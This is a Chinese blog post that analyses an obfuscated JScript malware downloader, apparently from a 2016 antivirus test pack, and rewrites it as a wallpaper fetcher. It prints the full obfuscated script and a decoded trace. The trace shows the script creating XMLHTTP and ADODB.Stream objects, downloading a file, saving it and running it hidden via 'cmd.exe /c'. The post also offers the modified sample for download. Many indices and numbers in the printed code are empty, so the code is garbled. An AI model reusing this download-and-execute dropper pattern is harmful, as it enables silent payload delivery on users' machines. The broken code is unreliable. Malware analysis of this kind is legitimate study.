本篇是对JS样本做的简单分析,并将该样本改造成快速更换壁纸的工具,也可以用来下载网页.这是很久之前的事了,样本大概是卡饭16年12.16测试包里的.
0x1 我擦,这是啥!
var kqyxuz = "e;"
var tofla = "Ope"
var upugryf = ":\\"
var uffytr = "m.u"
var yvemken = "Fo"
var wymipi = ") "
var jmisniqby = " "
var zmymep = "sp"
var ycpato = "ne"
var iwgude = "HT"
var imudle = "nyi"
var epgad = ")."
var ibyzl = "gor"
var yxypehn = "op"
var isuby = "re"
var zerdu = "e "
var qdizrazy = "Ful"
var qecmuz = "for"
var bnifpynmu = "GET"
var xukkugpu = "MS"
var lfapob = "s3"
var ygsok = "eam"
var tlimto = ".n"
var ynsegru = "= "
var xputhyzhe = "se"
var ozoru = "ADO"
var nereqi = "Sy"
var lzojaf = "Tem"
var ixyqjewg = "rn"
var orwoh = "rs"
var lwiju = "0"
var qahtyry = "eTo"
var djugy = "'C"
var qypivd = "5."
var atniz = "Obj"
var rakxoba = "th"
var lihcuze = "le"
var lopedni = "os"
var havkafz = "tF"
var bhaxa = "cm"
var hutpopzi = "ri"
var ydtygtefc = "if"
var anqabyb = "Cre"
var lreptuqzi = "men"
var qolilge = "WS"
var cpuphylm = "Re"
var jyvibwi = "ML"
var zwapy = "at"
var boxdu = "/c"
var omykk = "pNa"
var juxno = "pe"
var jgekfo = "/ka"
var rdifbyji = "ng"
var oxpoc = " "
var awnabda = "(i"
var ficy = "t"
var ftylunr = "\\'"
var yjufja = "Sc"
var ipurybg = "p:/"
var xekela = "me"
var entukat = "(y"
var dihgy = "se"
var sepziwb = "al"
var ojnike = "st"
var eqzamyxm = "am"
var qecego = "ex"
var iwsezpi = "l"
var ohovvi = "pe"
var roknadf = "Fil"
var kpebuf = "ip"
var gfugpalv = "Su"
var offotw = "rip"
var gbidufe = ");"
var ekupry = "le"
var szema = "on"
var ukpot = "em"
var bivygy = "er"
var vlovu = "d."
var otiju = "Scr"
var kredak = "io"
var edbosfo = "pt"
var yslam = "r("
var omygcurn = "ru/"
var yzviji = "e."
var irrut = "Ge"
var odapan = "de"
var edisno = "de"
var ejup = "Bo"
var aqwidnapl = "Ge"
var affij = "ci"
var inegz = " 1"
var ixypki = "n"
var ehyhkor = "ke"
var axequ = "um"
var pqyjo = "En"
var zrypy = "WSc"
var lwalwylr = "ru"
var exov = "e"
var ohapzy = "ate"
var ynjotm = "TP"
var zjidude = "tS"
var idwodelx = "el"
var ocfobyff = "1"
var sesyve = " f"
var etdufmaf = "ld"
var cjupryhfi = "en"
var lozku = "e "
var iqwigxysq = ";"
var xboroxb = "je"
var naqhi = "dy"
var squfquh = " >"
var dytywko = "Ob"
var welveq = "ipt"
var srunpe = "n"
var varlu = "ol"
var imsimyq = ".i"
var ugotri = "ct"
var ssywu = "XM"
var pwuzahwi = "zs"
var izxobmo = "g."
var exag = "bd"
var gexga = "er"
var giqu = "t."
var uqzyc = "al"
var evsupe = "Cl"
var mytpo = "Str"
var opqannan = "0)"
var egfomxe = "of"
var ipyfnob = "tu"
var fdilbybs = "ect"
var dgalo = "nk"
var ydopyz = "Wri"
var lokux = "lNa"
var igubm = "te"
var acwyvy = " t"
var yqvitik = "me"
var sufxexdo = "Fi"
var esgacnul = "Sav"
var zgara = "tu"
var amikze = "te"
var orsad = "in"
var gmisuh = ".X"
var afhygs = "se"
var hmesgaga = "re"
var lgyhuk = "ez"
var uhube = "Sh"
var nsukeso = "od."
var irbyha = "or"
var hjypsyv = "in"
var iwdudno = "3 "
var ppelonx = "et"
var ukud = "cr"
var tewo = "m("
var gosax = "r "
var ogkom = "ty"
var gofoja = "nd"
var igydpa = "DB."
var pnazibo = "w "
var ojuf = "ru"
var igjite = "ol"
var ebylx = "va"
var heni = "ls"
var zmahxinc = "L2"
var cubygri = "e"
var dyzagh = "rn"
var zisvu = " e"
var fekepy = "Get"
var xufxodc = "bF"
var localPahtTest = "C:\\Users\\tech\\Desktop\\dog.jpg"
var specialPath = "0"
var chars = ['0','1','2','3','4','5','6','7','8','9','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z'];
var rand = generateMixed();
var fileName = rand + "dog.jpg"
var url2 = GetRandomNum(,);
var url3 = "http://img.bizhi.sogou.com/images/2015/01/20/105"
var strurl2 = url2.toString();
var url4 = ".jpg?f=download"
var ovfowqi = url3 + strurl2 + url4
function GetRandomNum(Min,Max){
var Range = Max - Min;
var Rand = Math.random();
return(Min + Math.round(Rand * Range));
}
function generateMixed() {
var res = "";
var id1 = Math.ceil(Math.random()*);
var id2 = Math.ceil(Math.random()*);
var id3 = Math.ceil(Math.random()*);
res = chars[id1] + chars[id2] + chars[id3];
return res;
}
var ybdetof5 = new ActiveXObject('Scripting.FileSystemObject');
if (['dm', 'o', new Function(['e', ebylx, 'u', 'f'][] + [gosax, 'b'][] + ['e', 'y', hjypsyv, 'y'][] + [ehyhkor, 'hv', 'o', 'y'][] + [pwuzahwi, 'xx', 'u'][] + ['i', iwdudno, 'hf', 'z'][] + ['a', ynsegru, 'i'][] + ['u', 'i', ycpato][] + ['e', pnazibo, 'e'][] + ['c', pqyjo][] + ['i', 'u', axequ, 'e'][] + ['o', 'f', bivygy, 'r'][] + ['i', zwapy, 'o'][] + [irbyha, 'j'][] + ['v', 'hg', entukat][] + ['f', 'o', 'b', exag][] + ['c', 'lh', ppelonx, 'fh'][] + ['i', egfomxe][] + ['v', qypivd][] + [aqwidnapl, 'v'][] + [havkafz, 'a', 'e', 'a'][] + [igjite, 'y', 'u'][] + ['bx', odapan][] + ['wg', 'w', yslam, 'e'][] + [djugy, 'o', 'a'][] + ['e', upugryf, 'y'][] + ['a', ftylunr, 'wr', 'a'][] + ['v', epgad][] + ['dl', 'o', gfugpalv, 'pn'][] + ['dp', 'u', 'n', xufxodc][] + [varlu, 'u', 'u'][] + [edisno, 'i', 'k', 'cg'][] + ['i', 'vb', orwoh, 'i'][] + ['k', 'xc', 'r', gbidufe][] + [jmisniqby, 'k', 'll', 'e'][] + [ydtygtefc, 'i', 'dp'][] + ['t', awnabda][] + [dgalo, 'tx', 'kt', 'y'][] + ['y', lgyhuk, 'f', 'k'][] + [lfapob, 'u', 'sz', 'w'][] + [imsimyq, 'a'][] + [igubm, 'a', 's', 'e'][] + ['e', 'a', tewo][] + [opqannan, 'q'][] + ['i', 'll', 'sm', tlimto][] + ['o', eqzamyxm][] + [yzviji, 'f', 'z', 'bp'][] + ['sx', ekupry, 'cs'][] + [rdifbyji, 'u', 't', 'o'][] + [rakxoba, 'mc', 'x'][] + [squfquh, 'rs', 'y', 'mb'][] + [inegz, 'u', 'lg', 'y'][] + ['gw', wymipi, 'a'][] + [isuby, 'y'][] + ['y', 'i', 'h', ipyfnob][] + [ixyqjewg, 'v'][] + [acwyvy, 'xr', 't'][] + ['p', 'nt', 'y', ojuf][] + ['y', 'gz', kqyxuz][] + [zisvu, 'o', 'y'][] + ['j', heni][] + [zerdu, 'a'][] + [hmesgaga, 'd', 'i'][] + [zgara, 'dg', 'e'][] + [dyzagh, 'j'][] + [sesyve, 'u', 'o'][] + ['i', uqzyc, 'u'][] + ['e', xputhyzhe][] + ['e', iqwigxysq, 'n'][])()][]) {
hneneqil0 = this[['mt', 'u', zrypy, 'e'][] + ['i', offotw, 'w'][] + ['y', 'h', ficy, 'y'][]];
istudyd7 = hneneqil0[['hl', anqabyb][] + ['sn', ohapzy, 'jr'][] + ['o', atniz, 'a', 'dv'][] + ['ww', fdilbybs, 'q'][]](['xm', yjufja][] + ['zj', hutpopzi, 'o'][] + ['w', 'y', 'q', edbosfo][] + ['i', 'o', orsad][] + ['tk', 'o', 's', izxobmo][] + [sufxexdo, 'y', 'u'][] + ['vd', lihcuze][] + ['y', nereqi, 'z', 'y'][] + ['o', 'e', ojnike][] + ['e', ukpot, 'y'][] + ['e', dytywko][] + ['w', xboroxb][] + [ugotri, 'k', 'y'][]);
lysfopdep3 = hneneqil0[['hl', anqabyb][] + ['sn', ohapzy, 'jr'][] + ['o', atniz, 'a', 'dv'][] + ['ww', fdilbybs, 'q'][]](['i', 'w', 'i', qolilge][] + ['o', ukud, 'e'][] + ['a', 'f', kpebuf, 'e'][] + ['y', giqu, 'nz', 'u'][] + [uhube, 'm', 'e', 'o'][] + ['u', 'y', idwodelx, 'e'][] + [iwsezpi, 'o'][]);
woqvybd3 = hneneqil0[['hl', anqabyb][] + ['sn', ohapzy, 'jr'][] + ['o', atniz, 'a', 'dv'][] + ['ww', fdilbybs, 'q'][]](['rq', 'o', xukkugpu][] + ['dh', ssywu][] + [zmahxinc, 'u', 'jt'][] + ['gc', 'h', gmisuh, 'i'][] + ['y', jyvibwi, 'e'][] + ['a', 'y', iwgude][] + ['y', 'ht', ynjotm][]);
jucyzmum2 = hneneqil0[['hl', anqabyb][] + ['sn', ohapzy, 'jr'][] + ['o', atniz, 'a', 'dv'][] + ['ww', fdilbybs, 'q'][]](['u', ozoru][] + ['vq', igydpa][] + ['e', mytpo, 'hw', 'y'][] + ['u', 'i', 'u', ygsok][]);
deskPath = istudyd7[['dk', irrut, 'u', 'e'][] + ['q', zjidude][] + ['u', ohovvi][] + ['o', 'a', affij][] + ['u', sepziwb][] + [yvemken, 'r'][] + ['i', 'y', etdufmaf, 'y'][] + [gexga, 'y'][]](['o', specialPath][]);
ubujile0 = istudyd7[['a', fekepy, 'bf'][] + ['s', lzojaf, 'c', 'mx'][] + ['a', 'zw', 'o', omykk][] + ['e', 'a', yqvitik][]]();
fxejoplod6 = woqvybd3[[yxypehn, 'gh', 'pk', 'o'][] + ['rg', 'q', cjupryhfi][]]([bnifpynmu, 'mj', 'e'][], [ovfowqi, 'm', 'w'][] , ['k', lwiju][]);
fxejoplod6 = woqvybd3[['vd', 'o', dihgy][] + ['zj', gofoja][]]();
jucyzmum2[['a', ogkom, 'jv'][] + ['a', 'i', 'z', juxno][]] = ['i', 'a', 'a', ocfobyff][];
avolcuc7 = woqvybd3[[cpuphylm, 'mq'][] + ['z', 't', 'q', zmymep][] + ['i', szema][] + ['a', afhygs, 'g'][] + ['o', ejup, 'i', 'i'][] + ['vz', naqhi][]];
hnoqasann0 = hneneqil0[['h', 'u', otiju][] + ['kk', welveq][] + ['b', qdizrazy][] + [lokux, 'm'][] + ['gz', xekela, 'n', 't'][]];
fxejoplod6 = jucyzmum2[['e', 'vl', tofla][] + ['nm', ixypki, 'mj'][]]();
fxejoplod6 = jucyzmum2[[ydopyz, 'u', 'q'][] + ['e', amikze][]](avolcuc7);
fxejoplod6 = jucyzmum2[['f', 'rn', 's', esgacnul][] + ['a', qahtyry, 'y', 's'][] + ['u', roknadf, 'u'][] + ['p', cubygri][]](deskPath + fileName);
fxejoplod6 = jucyzmum2[[evsupe, 'i', 'kt'][] + ['o', 'c', lopedni][] + ['f', exov][]]();
fxejoplod6 = lysfopdep3[['a', lwalwylr][] + ['i', 'c', srunpe, 'pp'][]](['l', 'l', bhaxa, 'h'][] + ['wm', vlovu][] + ['ps', 'e', qecego][] + [lozku, 'y', 'ws'][] + [boxdu, 'bh', 'z', 'z'][] + [oxpoc, 'tk', 'n', 'u'][] + deskPath + fileName, ['k', lwiju][]);
var fso=new ActiveXObject('Scripting.FileSystemObject');
var f = fso.CreateTextFile("C:\\log_24.txt", true);
f.Write("hneneqil0 = this["+['mt', 'u', zrypy, 'e'][] + ['i', offotw, 'w'][] + ['y', 'h', ficy, 'y'][] +"]");
f.WriteBlankLines() ;
f.Write("istudyd7 = hneneqil0["+['hl', anqabyb][] + ['sn', ohapzy, 'jr'][] + ['o', atniz, 'a', 'dv'][] + ['ww', fdilbybs, 'q'][] + "]"+"("+['xm', yjufja][] + ['zj', hutpopzi, 'o'][] + ['w', 'y', 'q', edbosfo][] + ['i', 'o', orsad][] + ['tk', 'o', 's', izxobmo][] + [sufxexdo, 'y', 'u'][] + ['vd', lihcuze][] + ['y', nereqi, 'z', 'y'][] + ['o', 'e', ojnike][] + ['e', ukpot, 'y'][] + ['e', dytywko][] + ['w', xboroxb][] + [ugotri, 'k', 'y'][]+")");
f.WriteBlankLines() ;
f.Write("lysfopdep3 = hneneqil0["+['hl', anqabyb][] + ['sn', ohapzy, 'jr'][] + ['o', atniz, 'a', 'dv'][] + ['ww', fdilbybs, 'q'][] + "]"+"("+['i', 'w', 'i', qolilge][] + ['o', ukud, 'e'][] + ['a', 'f', kpebuf, 'e'][] + ['y', giqu, 'nz', 'u'][] + [uhube, 'm', 'e', 'o'][] + ['u', 'y', idwodelx, 'e'][] + [iwsezpi, 'o'][]+")");
f.WriteBlankLines() ;
f.Write("woqvybd3 = hneneqil0["+['hl', anqabyb][] + ['sn', ohapzy, 'jr'][] + ['o', atniz, 'a', 'dv'][] + ['ww', fdilbybs, 'q'][] + "]"+"("+['rq', 'o', xukkugpu][] + ['dh', ssywu][] + [zmahxinc, 'u', 'jt'][] + ['gc', 'h', gmisuh, 'i'][] + ['y', jyvibwi, 'e'][] + ['a', 'y', iwgude][] + ['y', 'ht', ynjotm][]+")");
f.WriteBlankLines() ;
f.Write("jucyzmum2 = hneneqil0["+['hl', anqabyb][] + ['sn', ohapzy, 'jr'][] + ['o', atniz, 'a', 'dv'][] + ['ww', fdilbybs, 'q'][] + "]"+"("+['u', ozoru][] + ['vq', igydpa][] + ['e', mytpo, 'hw', 'y'][] + ['u', 'i', 'u', ygsok][]+")");
f.WriteBlankLines() ;
f.Write("deskPath = istudyd7[" + ['dk', irrut, 'u', 'e'][] + ['q', zjidude][] + ['u', ohovvi][] + ['o', 'a', affij][] + ['u', sepziwb][] + [yvemken, 'r'][] + ['i', 'y', etdufmaf, 'y'][] + [gexga, 'y'][] + "]" + "(" +['o', specialPath][] +")" );
f.WriteBlankLines() ;
f.Write("ubujile0 = istudyd7[" + ['a', fekepy, 'bf'][] + ['s', lzojaf, 'c', 'mx'][] + ['a', 'zw', 'o', omykk][] + ['e', 'a', yqvitik][] + "]"+"()");
f.WriteBlankLines() ;
f.Write("fxejoplod6 = woqvybd3[" + [yxypehn, 'gh', 'pk', 'o'][] + ['rg', 'q', cjupryhfi][] +"]"+"("+[bnifpynmu, 'mj', 'e'][] +"," +[ovfowqi, 'm', 'w'][] +","+ ['k', lwiju][]+")");
f.WriteBlankLines() ;
f.Write("fxejoplod6 = woqvybd3[" + ['vd', 'o', dihgy][] + ['zj', gofoja][]+"]()");
f.WriteBlankLines() ;
f.Write( "jucyzmum2[" + ['a', ogkom, 'jv'][] + ['a', 'i', 'z', juxno][] +"] = " + ['i', 'a', 'a', ocfobyff][] );
f.WriteBlankLines() ;
f.Write( "avolcuc7 = woqvybd3[" + [cpuphylm, 'mq'][] + ['z', 't', 'q', zmymep][] + ['i', szema][] + ['a', afhygs, 'g'][] + ['o', ejup, 'i', 'i'][] + ['vz', naqhi][]+"]" );
f.WriteBlankLines() ;
f.Write( "hnoqasann0 = hneneqil0[" + ['h', 'u', otiju][] + ['kk', welveq][] + ['b', qdizrazy][] + [lokux, 'm'][] + ['gz', xekela, 'n', 't'][]+"]" );
f.WriteBlankLines() ;
f.Write("fxejoplod6 = jucyzmum2[" + ['e', 'vl', tofla][] + ['nm', ixypki, 'mj'][] +"]()");
f.WriteBlankLines() ;
f.Write("fxejoplod6 = jucyzmum2[" + [ydopyz, 'u', 'q'][] + ['e', amikze][]+"]("+ avolcuc7+ ")" );
f.WriteBlankLines() ;
f.Write("fxejoplod6 = jucyzmum2[" + ['f', 'rn', 's', esgacnul][] + ['a', qahtyry, 'y', 's'][] + ['u', roknadf, 'u'][] + ['p', cubygri][] + "](" + deskPath + fileName + ")" );
f.WriteBlankLines() ;
f.Write("fxejoplod6 = jucyzmum2[" + [evsupe, 'i', 'kt'][] + ['o', 'c', lopedni][] + ['f', exov][] + "]()");
f.WriteBlankLines() ;
f.Write("fxejoplod6 = lysfopdep3[" + ['a', lwalwylr][] + ['i', 'c', srunpe, 'pp'][] +"]("+['l', 'l', bhaxa, 'h'][] + ['wm', vlovu][] + ['ps', 'e', qecego][] + [lozku, 'y', 'ws'][] + [boxdu, 'bh', 'z', 'z'][] + [oxpoc, 'tk', 'n', 'u'][] + deskPath + fileName + "," + ['k', lwiju][] +")");
f.WriteBlankLines() ;
f.Close();
}
0x2 哦,是这样啊…
2.1首先声明下:
从 var localPahtTest = “C:\Users\tech\Desktop\dog.jpg”到 var ybdetof5 = new ActiveXObject 之间的第1段(以下简称第1段);
从 var fso=new ActiveXObject(‘Scripting 到 f.Close();之间的第2段 都是后来改造添加的.
2.2 庐山真面目
有没有很酸爽的感觉,前面到底是啥玩意,尤其是去除后来添加的.没事,还是用VBS时不靠谱的办法来处理,所以添加了第2段.
可以明显的看到the real code saved to “C:\log_24.txt”,你随意,我就喜欢保存到这.好了,双击一下试试效果(当然现在输出的是我改后下壁纸的):
hneneqil0 = this[WScript]
istudyd7 = hneneqil0[CreateObject](Scripting.FileSystemObject)
lysfopdep3 = hneneqil0[CreateObject](WScript.Shell)
woqvybd3 = hneneqil0[CreateObject](MSXML2.XMLHTTP)
jucyzmum2 = hneneqil0[CreateObject](ADODB.Stream)
deskPath = istudyd7[GetSpecialFolder](0)
ubujile0 = istudyd7[GetTempName]()
fxejoplod6 = woqvybd3[open](GET,http://img.bizhi.sogou.com/images/2015/01/20/1052908.jpg?f=download,0)
fxejoplod6 = woqvybd3[send]()
jucyzmum2[type] = 1
avolcuc7 = woqvybd3[ResponseBody]
hnoqasann0 = hneneqil0[ScriptFullName]
fxejoplod6 = jucyzmum2[Open]()
fxejoplod6 = jucyzmum2[Write]()
fxejoplod6 = jucyzmum2[SaveToFile](C:\WindowsW7Qdog.jpg)
fxejoplod6 = jucyzmum2[Close]()
fxejoplod6 = lysfopdep3[run](cmd.exe /c C:\WindowsW7Qdog.jpg,0)
这下有没有感觉到瞬间亲切了,我看了以后也是泪奔啊,尼玛这不是我发小吗,穿个马甲就变高富帅了啊…
既然都见着面了,怎么着也得帮我干点活吧,正好咱这人没追求,就喜欢看美女,My eye must be all in desktop , life is short ,u need wallpaper.
2.3 Wallpaper
从网上搜了个美女壁纸,就跳到搜狗上去了,看起来果然是show girl啊,于是乎就她了.
下了一张看了下,嗯,挺美,可是每次都是同一张,这就不太友好了吧,于是测了一下,壁纸的编号都是顺序的,且有一个大概的范围(2650,4200),好了,那中间的编号在这个范围内随机,就可以看到不同的美女了,对吧,说干就干,就有了
var url2 = GetRandomNum(,);
var url3 = "http://img.bizhi.sogou.com/images/2015/01/20/105"
var strurl2 = url2.toString();
var url4 = ".jpg?f=download"
var ovfowqi = url3 + strurl2 + url4
function GetRandomNum(Min,Max){
var Range = Max - Min;
var Rand = Math.random();
return(Min + Math.round(Rand * Range));
}
下了好几次,爽了一会,发现有时新下的还不如刚才那张呢,可是已经被覆盖了,再也找不回来了,唉,好伤心啊….
为了能在桌面再看你一眼,那就都保存着吧,不想再看的积累多了手删就好了,你给girl起名字总得不一样吧
var specialPath = "0"
var chars = ['0','1','2','3','4','5','6','7','8','9','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z'];
var rand = generateMixed();
var fileName = rand + "dog.jpg"
function generateMixed() {
var res = "";
var id1 = Math.ceil(Math.random()*);
var id2 = Math.ceil(Math.random()*);
var id3 = Math.ceil(Math.random()*);
res = chars[id1] + chars[id2] + chars[id3];
return res;
}
好了,这下满足了...
2.4 web
某天一拍脑袋,貌似上面这样做太明显了,就装个学习吧,然后就2次修改成下网页(文章)的了.
0x3 SampleBeRevisedAsDown.
Sample-请确认样本只用于测试才下载,其他的我可不负-密码国际惯例
你只需要下载后放到桌面双击就ok了...
最后传一张美女图:
![jmeter学习——jmeter参数化[图]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)